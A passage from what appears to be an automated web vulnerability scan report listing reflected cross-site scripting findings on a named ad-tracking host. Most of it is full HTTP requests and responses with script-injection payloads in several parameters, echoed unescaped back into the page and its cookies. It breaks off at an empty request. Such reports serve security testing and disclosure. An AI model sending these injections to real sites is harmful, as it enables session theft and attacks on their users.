The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 3e6c0<script>alert(1)</script>2500faae125 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4803e6c0<script>alert(1)</script>2500faae125&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:32 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4803e6c0<script>alert(1)</script>2500faae125-SM=adver_05-12-2011-13-34-32; expires=Sun, 15-May-2011 13:34:32 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4803e6c0<script>alert(1)</script>2500faae125-VT=adver_05-12-2011-13-34-32_12907428141305207272; expires=Tue, 10-May-2016 13:34:32 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4803e6c0<script>alert(1)</script>2500faae125-nUID=adver_12907428141305207272; expires=Thu, 12-May-2011 13:49:32 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4803e6c0<script>alert(1)</script>2500faae125';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12907428141305207272';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv=
...[SNIP]...

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 4c8e5<script>alert(1)</script>3b4a9a22f22 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver4c8e5<script>alert(1)</script>3b4a9a22f22&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:34:29 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver4c8e5%3Cscript%3Ealert%281%29%3C%2Fscript%3E3b4a9a22f22_05-12-2011-13-34-29_14987820991305207269; expires=Tue, 10-May-2016 13:34:29 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver4c8e5%3Cscript%3Ealert%281%29%3C%2Fscript%3E3b4a9a22f22_14987820991305207269; expires=Thu, 12-May-2011 13:49:29 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver4c8e5<script>alert(1)</script>3b4a9a22f22';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='149878209913052
...[SNIP]...

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d1300<script>alert(1)</script>f343af93cf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/d1300<script>alert(1)</script>f343af93cf0&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:08 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-08_14282156031305207308; expires=Tue, 10-May-2016 13:35:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14282156031305207308; expires=Thu, 12-May-2011 13:50:08 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='14282156031305207308';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/d1300<script>alert(1)</script>f343af93cf0';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload def86<script>alert(1)</script>9eee544342d was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=def86<script>alert(1)</script>9eee544342d&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-00_12374438441305207300; expires=Tue, 10-May-2016 13:35:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_12374438441305207300; expires=Thu, 12-May-2011 13:50:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12374438441305207300';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='def86<script>alert(1)</script>9eee544342d';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f8e87<script>alert(1)</script>c1ec23e9e95 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72f8e87<script>alert(1)</script>c1ec23e9e95&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:34:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-34-58_711316571305207298; expires=Tue, 10-May-2016 13:34:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_711316571305207298; expires=Thu, 12-May-2011 13:49:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
;this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='711316571305207298';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72f8e87<script>alert(1)</script>c1ec23e9e95';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload baa91<script>alert(1)</script>c29c50d111f was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=baa91<script>alert(1)</script>c29c50d111f&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-03_11345519711305207303; expires=Tue, 10-May-2016 13:35:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11345519711305207303; expires=Thu, 12-May-2011 13:50:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='11345519711305207303';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='baa91<script>alert(1)</script>c29c50d111f';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload a06dd<script>alert(1)</script>49f90eb1dd2 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

